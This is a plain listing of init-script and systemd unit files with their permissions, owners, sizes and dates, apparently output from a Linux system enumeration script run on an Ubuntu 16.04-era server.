-rwxr-xr-x   1 root root   937 Mar 28  2015 cryptdisks
-rwxr-xr-x   1 root root   896 Mar 28  2015 cryptdisks-early
-rwxr-xr-x   1 root root  2813 Dec  2  2015 dbus
-rw-r--r--   1 root root  1228 Jun  6  2016 .depend.boot
-rw-r--r--   1 root root  1375 Jun  6  2016 .depend.start
-rw-r--r--   1 root root  1653 Jun  6  2016 .depend.stop
-rwxr-xr-x   1 root root  8290 Jul 30  2015 dnsmasq
-rwxr-xr-x   1 root root  1105 Mar 15  2016 grub-common
-rwxr-xr-x   1 root root  1336 Jan 19  2016 halt
-rwxr-xr-x   1 root root  1423 Jan 19  2016 hostname.sh
-rwxr-xr-x   1 root root  3809 Mar 12  2016 hwclock.sh
-rwxr-xr-x   1 root root  1971 May 26  2015 inetutils-inetd
-rwxr-xr-x   1 root root  1503 Mar 29  2016 iscsid
-rwxr-xr-x   1 root root  1300 Jan 19  2016 killprocs
-rwxr-xr-x   1 root root  2087 Dec 20  2015 kmod
-rwxr-xr-x   1 root root   695 Oct 30  2015 lvm2
-rwxr-xr-x   1 root root   571 Oct 30  2015 lvm2-lvmetad
-rwxr-xr-x   1 root root   586 Oct 30  2015 lvm2-lvmpolld
-rwxr-xr-x   1 root root  2300 Apr  4  2016 lxcfs
-rwxr-xr-x   1 root root  2611 Apr 11  2016 mdadm
-rwxr-xr-x   1 root root  1199 Jul 16  2014 mdadm-waitidle
-rwxr-xr-x   1 root root   703 Jan 19  2016 mountall-bootclean.sh
-rwxr-xr-x   1 root root  2301 Jan 19  2016 mountall.sh
-rwxr-xr-x   1 root root  1461 Jan 19  2016 mountdevsubfs.sh
-rwxr-xr-x   1 root root  1564 Jan 19  2016 mountkernfs.sh
-rwxr-xr-x   1 root root   711 Jan 19  2016 mountnfs-bootclean.sh
-rwxr-xr-x   1 root root  2456 Jan 19  2016 mountnfs.sh
-rwxr-xr-x   1 root root  5607 Apr 21  2016 mysql
-rwxr-xr-x   1 root root  1364 Jan  2  2016 netfilter-persistent
-rwxr-xr-x   1 root root  4771 Jul 19  2015 networking
-rwxr-xr-x   1 root root  1948 Mar  8  2016 nmbd
-rwxr-xr-x   1 root root  1581 Oct 16  2015 ondemand
-rwxr-xr-x   1 root root  2503 Mar 29  2016 open-iscsi
-rwxr-xr-x   1 root root  1578 Mar 29  2016 open-vm-tools
-rwxr-xr-x   1 root root  4987 May 19  2016 php7.0-fpm
-rwxr-xr-x   1 root root  1366 Nov 15  2015 plymouth
-rwxr-xr-x   1 root root   752 Nov 15  2015 plymouth-log
-rwxr-xr-x   1 root root  7959 Apr 13  2016 postfix
-rwxr-xr-x   1 root root  1192 Sep  6  2015 procps
-rwxr-xr-x   1 root root  6366 Jan 19  2016 rc
-rwxr-xr-x   1 root root   820 Jan 19  2016 rc.local
-rwxr-xr-x   1 root root   117 Jan 19  2016 rcS
-rw-r--r--   1 root root  2427 Jan 19  2016 README
-rwxr-xr-x   1 root root   661 Jan 19  2016 reboot
-rwxr-xr-x   1 root root  4149 Nov 23  2015 resolvconf
-rwxr-xr-x   1 root root  4355 Jul 10  2014 rsync
-rwxr-xr-x   1 root root  2796 Feb  3  2016 rsyslog
-rwxr-xr-x   1 root root  1266 Mar  8  2016 samba
-rwxr-xr-x   1 root root  2299 Mar  8  2016 samba-ad-dc
-rwxr-xr-x   1 root root  1226 Jun  9  2015 screen-cleanup
-rwxr-xr-x   1 root root  3927 Jan 19  2016 sendsigs
-rwxr-xr-x   1 root root   597 Jan 19  2016 single
-rw-r--r--   1 root root  1087 Jan 19  2016 skeleton
-rwxr-xr-x   1 root root  1930 Mar  8  2016 smbd
-rwxr-xr-x   1 root root  4077 Apr 13  2016 ssh
-rwxr-xr-x   1 root root  6087 Apr 12  2016 udev
-rwxr-xr-x   1 root root  2737 Jan 19  2016 umountfs
-rwxr-xr-x   1 root root  2202 Jan 19  2016 umountnfs.sh
-rwxr-xr-x   1 root root  1879 Jan 19  2016 umountroot
-rwxr-xr-x   1 root root  1379 Feb 18  2016 unattended-upgrades
-rwxr-xr-x   1 root root  3111 Jan 19  2016 urandom
-rwxr-xr-x   1 root root  2031 Feb 10  2016 vsftpd


[[-] /etc/init/ config file permissions:
total 168
drwxr-xr-x   2 root root  4096 Jun  6  2016 .
drwxr-xr-x 100 root root 12288 Jul 22 17:31 ..
-rw-r--r--   1 root root   338 Apr  8  2016 acpid.conf
-rw-r--r--   1 root root  3695 Feb 16  2016 apparmor.conf
-rw-r--r--   1 root root  1626 Apr 14  2016 apport.conf
-rw-r--r--   1 root root   250 Apr  4  2016 console-font.conf
-rw-r--r--   1 root root   509 Apr  4  2016 console-setup.conf
-rw-r--r--   1 root root   297 Apr  5  2016 cron.conf
-rw-r--r--   1 root root  1519 Mar 28  2015 cryptdisks.conf
-rw-r--r--   1 root root   412 Mar 28  2015 cryptdisks-udev.conf
-rw-r--r--   1 root root   482 Sep  1  2015 dbus.conf
-rw-r--r--   1 root root   284 Jul 23  2013 hostname.conf
-rw-r--r--   1 root root   300 May 21  2014 hostname.sh.conf
-rw-r--r--   1 root root   674 Mar 14  2016 hwclock.conf
-rw-r--r--   1 root root   561 Mar 14  2016 hwclock-save.conf
-rw-r--r--   1 root root   109 Mar 14  2016 hwclock.sh.conf
-rw-r--r--   1 root root   689 Aug 20  2015 kmod.conf
-rw-r--r--   1 root root   540 Apr  4  2016 lxcfs.conf
-rw-r--r--   1 root root  1757 Apr 21  2016 mysql.conf
-rw-r--r--   1 root root  2493 Jun  2  2015 networking.conf
-rw-r--r--   1 root root   933 Jun  2  2015 network-interface.conf
-rw-r--r--   1 root root   530 Jun  2  2015 network-interface-container.conf
-rw-r--r--   1 root root  1756 Jun  2  2015 network-interface-security.conf
-rw-r--r--   1 root root   483 Mar  8  2016 nmbd.conf
-rw-r--r--   1 root root   568 Feb  1  2016 passwd.conf
-rw-r--r--   1 root root   398 May 19  2016 php7.0-fpm.conf
-rw-r--r--   1 root root   119 Jun  5  2014 procps.conf
-rw-r--r--   1 root root   363 Jun  5  2014 procps-instance.conf
-rw-r--r--   1 root root   213 Mar  8  2016 reload-smbd.conf
-rw-r--r--   1 root root   457 Jun  3  2015 resolvconf.conf
-rw-r--r--   1 root root   426 Dec  2  2015 rsyslog.conf
-rw-r--r--   1 root root   403 Mar  8  2016 samba-ad-dc.conf
-rw-r--r--   1 root root   230 Apr  4  2016 setvtrgb.conf
-rw-r--r--   1 root root   319 Mar  8  2016 smbd.conf
-rw-r--r--   1 root root   641 Apr 13  2016 ssh.conf
-rw-r--r--   1 root root   337 Apr 12  2016 udev.conf
-rw-r--r--   1 root root   360 Apr 12  2016 udevmonitor.conf
-rw-r--r--   1 root root   352 Apr 12  2016 udevtrigger.conf
-rw-r--r--   1 root root   889 Feb 24  2015 ureadahead.conf
-rw-r--r--   1 root root   683 Feb 24  2015 ureadahead-other.conf


[[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8.4M
drwxr-xr-x 26 root root  20K Jun  6  2016 system
drwxr-xr-x  2 root root 4.0K Jun  3  2016 system-generators
drwxr-xr-x  2 root root 4.0K Jun  3  2016 system-preset
drwxr-xr-x  2 root root 4.0K Jun  3  2016 network
-rwxr-xr-x  1 root root 438K Apr 12  2016 systemd-udevd
-rwxr-xr-x  1 root root  14K Apr 12  2016 systemd-ac-power
-rwxr-xr-x  1 root root  50K Apr 12  2016 systemd-activate
-rwxr-xr-x  1 root root  94K Apr 12  2016 systemd-backlight
-rwxr-xr-x  1 root root  50K Apr 12  2016 systemd-binfmt
-rwxr-xr-x  1 root root 307K Apr 12  2016 systemd-fsck
-rwxr-xr-x  1 root root  74K Apr 12  2016 systemd-fsckd
-rwxr-xr-x  1 root root 627K Apr 12  2016 systemd-logind
-rwxr-xr-x  1 root root  34K Apr 12  2016 systemd-random-seed
-rwxr-xr-x  1 root root 671K Apr 12  2016 systemd-resolved
-rwxr-xr-x  1 root root  74K Apr 12  2016 systemd-sleep
-rwxr-xr-x  1 root root 347K Apr 12  2016 systemd-timedated
-rwxr-xr-x  1 root root 1.5M Apr 12  2016 systemd
-rwxr-xr-x  1 root root 102K Apr 12  2016 systemd-bootchart
-rwxr-xr-x  1 root root 279K Apr 12  2016 systemd-cgroups-agent
-rwxr-xr-x  1 root root 347K Apr 12  2016 systemd-hostnamed
-rwxr-xr-x  1 root root 283K Apr 12  2016 systemd-initctl
-rwxr-xr-x  1 root root 803K Apr 12  2016 systemd-networkd
-rwxr-xr-x  1 root root  94K Apr 12  2016 systemd-rfkill
-rwxr-xr-x  1 root root 283K Apr 12  2016 systemd-update-utmp
-rwxr-xr-x  1 root root 367K Apr 12  2016 systemd-bus-proxyd
-rwxr-xr-x  1 root root  90K Apr 12  2016 systemd-cryptsetup
-rwxr-xr-x  1 root root  30K Apr 12  2016 systemd-hibernate-resume
-rwxr-xr-x  1 root root 342K Apr 12  2016 systemd-journald
-rwxr-xr-x  1 root root 355K Apr 12  2016 systemd-localed
-rwxr-xr-x  1 root root  54K Apr 12  2016 systemd-modules-load
-rwxr-xr-x  1 root root 122K Apr 12  2016 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  30K Apr 12  2016 systemd-quotacheck
-rwxr-xr-x  1 root root  54K Apr 12  2016 systemd-remount-fs
-rwxr-xr-x  1 root root  30K Apr 12  2016 systemd-reply-password
-rwxr-xr-x  1 root root 142K Apr 12  2016 systemd-shutdown
-rwxr-xr-x  1 root root  98K Apr 12  2016 systemd-socket-proxyd
-rwxr-xr-x  1 root root  54K Apr 12  2016 systemd-sysctl
-rwxr-xr-x  1 root root 146K Apr 12  2016 systemd-timesyncd
-rwxr-xr-x  1 root root  34K Apr 12  2016 systemd-user-sessions
drwxr-xr-x  2 root root 4.0K Apr 12  2016 system-shutdown
drwxr-xr-x  2 root root 4.0K Apr 12  2016 system-sleep
-rwxr-xr-x  1 root root 1.3K Apr 12  2016 systemd-sysv-install

/lib/systemd/system:
total 916K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 apache2.service.d
lrwxrwxrwx 1 root root    9 Jun  3  2016 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jun  3  2016 halt.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 timers.target.wants
lrwxrwxrwx 1 root root   21 Jun  3  2016 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Jun  3  2016 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Jun  3  2016 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root    9 Jun  3  2016 x11-common.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jun  3  2016 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Jun  3  2016 sigpwr.target.wants
lrwxrwxrwx 1 root root    9 Jun  3  2016 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root   16 Jun  3  2016 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Jun  3  2016 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Jun  3  2016 sendsigs.service -> /dev/null
lrwxrwxrwx 1 root root   16 Jun  3  2016 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Jun  3  2016 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jun  3  2016 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 resolvconf.service.wants
lrwxrwxrwx 1 root root    9 Jun  3  2016 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root   15 Jun  3  2016 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Jun  3  2016 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Jun  3  2016 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jun  3  2016 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jun  3  2016 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   22 Jun  3  2016 procps.service -> systemd-sysctl.service
drwxr-xr-x 2 root root 4.0K Jun  3  2016 rc-local.service.d
lrwxrwxrwx 1 root root    9 Jun  3  2016 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Jun  3  2016 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Jun  3  2016 local-fs.target.wants
lrwxrwxrwx 1 root root   28 Jun  3  2016 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Jun  3  2016 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Jun  3  2016 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Jun  3  2016 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Jun  3  2016 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Jun  3  2016 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Jun  3  2016 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root   24 Jun  3  2016 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root   25 Jun  3  2016 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Jun  3  2016 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 Jun  3  2016 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jun  3  2016 getty.target.wants
drwxr-xr-x 2 root root 4.0K Jun  3  2016 graphical.target.wants
lrwxrwxrwx 1 root root    9 Jun  3  2016 halt.service -> /dev/null
lrwxrwxrwx 1 root root   14 Jun  3  2016 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Jun  3  2016 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 bootmisc.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Jun  3  2016 busnames.target.wants
lrwxrwxrwx 1 root root    9 Jun  3  2016 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun  3  2016 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 May 20  2016 samba.service -> /dev/null
-rw-r--r-- 1 root root  386 May 19  2016 php7.0-fpm.service
-rw-r--r-- 1 root root  411 Apr 21  2016 mysql.service
-rw-r--r-- 1 root root  146 Apr 19  2016 snapd.frameworks-pre.target
-rw-r--r-- 1 root root  131 Apr 19  2016 snapd.frameworks.target
-rw-r--r-- 1 root root  235 Apr 19  2016 snapd.service
-rw-r--r-- 1 root root  245 Apr 19  2016 snapd.socket
-rw-r--r-- 1 root root  161 Apr 19  2016 snappy-autopilot.service
-rw-r--r-- 1 root root  208 Apr 19  2016 snappy-autopilot.timer
lrwxrwxrwx 1 root root   27 Apr 16  2016 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root   21 Apr 16  2016 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root  412 Apr 16  2016 plymouth-halt.service
-rw-r--r-- 1 root root  426 Apr 16  2016 plymouth-kexec.service
-rw-r--r-- 1 root root  421 Apr 16  2016 plymouth-poweroff.service
-rw-r--r-- 1 root root  194 Apr 16  2016 plymouth-quit.service
-rw-r--r-- 1 root root  200 Apr 16  2016 plymouth-quit-wait.service
-rw-r--r-- 1 root root  244 Apr 16  2016 plymouth-read-write.service
-rw-r--r-- 1 root root  416 Apr 16  2016 plymouth-reboot.service
-rw-r--r-- 1 root root  532 Apr 16  2016 plymouth-start.service
-rw-r--r-- 1 root root  291 Apr 16  2016 plymouth-switch-root.service
-rw-r--r-- 1 root root  490 Apr 16  2016 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 Apr 16  2016 systemd-ask-password-plymouth.service
lrwxrwxrwx 1 root root    9 Apr 16  2016 lvm2.service -> /dev/null
-rw-r--r-- 1 root root  334 Apr 16  2016 dm-event.service
-rw-r--r-- 1 root root  248 Apr 16  2016 dm-event.socket
-rw-r--r-- 1 root root  380 Apr 16  2016 lvm2-lvmetad.service
-rw-r--r-- 1 root root  215 Apr 16  2016 lvm2-lvmetad.socket
-rw-r--r-- 1 root root  335 Apr 16  2016 lvm2-lvmpolld.service
-rw-r--r-- 1 root root  213 Apr 16  2016 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root  658 Apr 16  2016 lvm2-monitor.service
-rw-r--r-- 1 root root  382 Apr 16  2016 lvm2-pvscan@.service
-rw-r--r-- 1 root root  385 Apr 13  2016 ssh.service
-rw-r--r-- 1 root root  196 Apr 13  2016 ssh@.service
-rw-r--r-- 1 root root  216 Apr 13  2016 ssh.socket
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel5.target.wants
-rw-r--r-- 1 root root  879 Apr 12  2016 basic.target
-rw-r--r-- 1 root root  379 Apr 12  2016 bluetooth.target
-rw-r--r-- 1 root root  358 Apr 12  2016 busnames.target
-rw-r--r-- 1 root root  770 Apr 12  2016 console-getty.service
-rw-r--r-- 1 root root  742 Apr 12  2016 console-shell.service
-rw-r--r-- 1 root root  791 Apr 12  2016 container-getty@.service
-rw-r--r-- 1 root root  394 Apr 12  2016 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Apr 12  2016 cryptsetup.target
-rw-r--r-- 1 root root 1010 Apr 12  2016 debug-shell.service
-rw-r--r-- 1 root root  670 Apr 12  2016 dev-hugepages.mount
-rw-r--r-- 1 root root  624 Apr 12  2016 dev-mqueue.mount
-rw-r--r-- 1 root root 1009 Apr 12  2016 emergency.service
-rw-r--r-- 1 root root  431 Apr 12  2016 emergency.target
-rw-r--r-- 1 root root  501 Apr 12  2016 exit.target
-rw-r--r-- 1 root root  440 Apr 12  2016 final.target
-rw-r--r-- 1 root root 1.5K Apr 12  2016 getty@.service
-rw-r--r-- 1 root root  460 Apr 12  2016 getty.target
-rw-r--r-- 1 root root  558 Apr 12  2016 graphical.target
-rw-r--r-- 1 root root  487 Apr 12  2016 halt.target
-rw-r--r-- 1 root root  447 Apr 12  2016 hibernate.target
-rw-r--r-- 1 root root  468 Apr 12  2016 hybrid-sleep.target
-rw-r--r-- 1 root root  630 Apr 12  2016 initrd-cleanup.service
-rw-r--r-- 1 root root  553 Apr 12  2016 initrd-fs.target
-rw-r--r-- 1 root root  790 Apr 12  2016 initrd-parse-etc.service
-rw-r--r-- 1 root root  526 Apr 12  2016 initrd-root-fs.target
-rw-r--r-- 1 root root  640 Apr 12  2016 initrd-switch-root.service
-rw-r--r-- 1 root root  691 Apr 12  2016 initrd-switch-root.target
-rw-r--r-- 1 root root  671 Apr 12  2016 initrd.target
-rw-r--r-- 1 root root  664 Apr 12  2016 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  501 Apr 12  2016 kexec.target
-rw-r--r-- 1 root root  677 Apr 12  2016 kmod-static-nodes.service
-rw-r--r-- 1 root root  395 Apr 12  2016 local-fs-pre.target
-rw-r--r-- 1 root root  507 Apr 12  2016 local-fs.target
-rw-r--r-- 1 root root  405 Apr 12  2016 machine.slice
-rw-r--r-- 1 root root  473 Apr 12  2016 mail-transport-agent.target
-rw-r--r-- 1 root root  492 Apr 12  2016 multi-user.target
-rw-r--r-- 1 root root  464 Apr 12  2016 network-online.target
-rw-r--r-- 1 root root  461 Apr 12  2016 network-pre.target
-rw-r--r-- 1 root root  480 Apr 12  2016 network.target
-rw-r--r-- 1 root root  514 Apr 12  2016 nss-lookup.target
-rw-r--r-- 1 root root  473 Apr 12  2016 nss-user-lookup.target
-rw-r--r-- 1 root root  554 Apr 12  2016 org.freedesktop.hostname1.busname
-rw-r--r-- 1 root root  550 Apr 12  2016 org.freedesktop.locale1.busname
-rw-r--r-- 1 root root  598 Apr 12  2016 org.freedesktop.login1.busname
-rw-r--r-- 1 root root  675 Apr 12  2016 org.freedesktop.network1.busname
-rw-r--r-- 1 root root  763 Apr 12  2016 org.freedesktop.resolve1.busname
-rw-r--r-- 1 root root  480 Apr 12  2016 org.freedesktop.systemd1.busname
-rw-r--r-- 1 root root  538 Apr 12  2016 org.freedesktop.timedate1.busname
-rw-r--r-- 1 root root  354 Apr 12  2016 paths.target
-rw-r--r-- 1 root root  552 Apr 12  2016 poweroff.target
-rw-r--r-- 1 root root  377 Apr 12  2016 printer.target
-rw-r--r-- 1 root root  693 Apr 12  2016 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Apr 12  2016 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  568 Apr 12  2016 quotaon.service
-rw-r--r-- 1 root root  612 Apr 12  2016 rc-local.service
-rw-r--r-- 1 root root  543 Apr 12  2016 reboot.target
-rw-r--r-- 1 root root  396 Apr 12  2016 remote-fs-pre.target
-rw-r--r-- 1 root root  482 Apr 12  2016 remote-fs.target
-rw-r--r-- 1 root root  978 Apr 12  2016 rescue.service
-rw-r--r-- 1 root root  486 Apr 12  2016 rescue.target
-rw-r--r-- 1 root root  500 Apr 12  2016 rpcbind.target
-rw-r--r-- 1 root root 1.1K Apr 12  2016 serial-getty@.service
-rw-r--r-- 1 root root  402 Apr 12  2016 shutdown.target
-rw-r--r-- 1 root root  362 Apr 12  2016 sigpwr.target
-rw-r--r-- 1 root root  420 Apr 12  2016 sleep.target
-rw-r--r-- 1 root root  403 Apr 12  2016 -.slice
-rw-r--r-- 1 root root  409 Apr 12  2016 slices.target
-rw-r--r-- 1 root root  380 Apr 12  2016 smartcard.target
-rw-r--r-- 1 root root  356 Apr 12  2016 sockets.target
-rw-r--r-- 1 root root  380 Apr 12  2016 sound.target
-rw-r--r-- 1 root root  441 Apr 12  2016 suspend.target
-rw-r--r-- 1 root root  353 Apr 12  2016 swap.target
-rw-r--r-- 1 root root  715 Apr 12  2016 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  518 Apr 12  2016 sysinit.target
-rw-r--r-- 1 root root  719 Apr 12  2016 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Apr 12  2016 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.3K Apr 12  2016 syslog.socket
-rw-r--r-- 1 root root  646 Apr 12  2016 systemd-ask-password-console.path
-rw-r--r-- 1 root root  653 Apr 12  2016 systemd-ask-password-console.service
-rw-r--r-- 1 root root  574 Apr 12  2016 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  681 Apr 12  2016 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  724 Apr 12  2016 systemd-backlight@.service
-rw-r--r-- 1 root root  959 Apr 12  2016 systemd-binfmt.service
-rw-r--r-- 1 root root  650 Apr 12  2016 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Apr 12  2016 systemd-bus-proxyd.service
-rw-r--r-- 1 root root  409 Apr 12  2016 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root  497 Apr 12  2016 systemd-exit.service
-rw-r--r-- 1 root root  551 Apr 12  2016 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Apr 12  2016 systemd-fsckd.socket
-rw-r--r-- 1 root root  674 Apr 12  2016 systemd-fsck-root.service
-rw-r--r-- 1 root root  648 Apr 12  2016 systemd-fsck@.service
-rw-r--r-- 1 root root  544 Apr 12  2016 systemd-halt.service
-rw-r--r-- 1 root root  631 Apr 12  2016 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  501 Apr 12  2016 systemd-hibernate.service
-rw-r--r-- 1 root root  710 Apr 12  2016 systemd-hostnamed.service
-rw-r--r-- 1 root root  778 Apr 12  2016 systemd-hwdb-update.service
-rw-r--r-- 1 root root  519 Apr 12  2016 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 Apr 12  2016 systemd-initctl.service
-rw-r--r-- 1 root root  524 Apr 12  2016 systemd-initctl.socket
-rw-r--r-- 1 root root  607 Apr 12  2016 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Apr 12  2016 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 1.3K Apr 12  2016 systemd-journald.service
-rw-r--r-- 1 root root  842 Apr 12  2016 systemd-journald.socket
-rw-r--r-- 1 root root  731 Apr 12  2016 systemd-journal-flush.service
-rw-r--r-- 1 root root  557 Apr 12  2016 systemd-kexec.service
-rw-r--r-- 1 root root  691 Apr 12  2016 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Apr 12  2016 systemd-logind.service
-rw-r--r-- 1 root root  693 Apr 12  2016 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  967 Apr 12  2016 systemd-modules-load.service
-rw-r--r-- 1 root root 1.4K Apr 12  2016 systemd-networkd.service
-rw-r--r-- 1 root root  591 Apr 12  2016 systemd-networkd.socket
-rw-r--r-- 1 root root  685 Apr 12  2016 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root  553 Apr 12  2016 systemd-poweroff.service
-rw-r--r-- 1 root root  614 Apr 12  2016 systemd-quotacheck.service
-rw-r--r-- 1 root root  717 Apr 12  2016 systemd-random-seed.service
-rw-r--r-- 1 root root  548 Apr 12  2016 systemd-reboot.service
-rw-r--r-- 1 root root  757 Apr 12  2016 systemd-remount-fs.service
-rw-r--r-- 1 root root  907 Apr 12  2016 systemd-resolved.service
-rw-r--r-- 1 root root  696 Apr 12  2016 systemd-rfkill.service
-rw-r--r-- 1 root root  617 Apr 12  2016 systemd-rfkill.socket
-rw-r--r-- 1 root root  497 Apr 12  2016 systemd-suspend.service
-rw-r--r-- 1 root root  649 Apr 12  2016 systemd-sysctl.service
-rw-r--r-- 1 root root  655 Apr 12  2016 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Apr 12  2016 systemd-timesyncd.service
-rw-r--r-- 1 root root  598 Apr 12  2016 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  450 Apr 12  2016 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  703 Apr 12  2016 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  683 Apr 12  2016 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  578 Apr 12  2016 systemd-udevd-control.socket
-rw-r--r-- 1 root root  570 Apr 12  2016 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  825 Apr 12  2016 systemd-udevd.service
-rw-r--r-- 1 root root  823 Apr 12  2016 systemd-udev-settle.service
-rw-r--r-- 1 root root  743 Apr 12  2016 systemd-udev-trigger.service
-rw-r--r-- 1 root root  757 Apr 12  2016 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  754 Apr 12  2016 systemd-update-utmp.service
-rw-r--r-- 1 root root  573 Apr 12  2016 systemd-user-sessions.service
-rw-r--r-- 1 root root  436 Apr 12  2016 system.slice
-rw-r--r-- 1 root root  585 Apr 12  2016 system-update.target
-rw-r--r-- 1 root root  405 Apr 12  2016 timers.target
-rw-r--r-- 1 root root  395 Apr 12  2016 time-sync.target
-rw-r--r-- 1 root root  417 Apr 12  2016 umount.target
-rw-r--r-- 1 root root  528 Apr 12  2016 user@.service
-rw-r--r-- 1 root root  392 Apr 12  2016 user.slice
-rw-r--r-- 1 root root  342 Apr 12  2016 getty-static.service
-rw-r--r-- 1 root root  153 Apr 12  2016 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root  152 Apr 12  2016 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root  548 Apr 12  2016 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root  234 Apr  8  2016 acpid.service
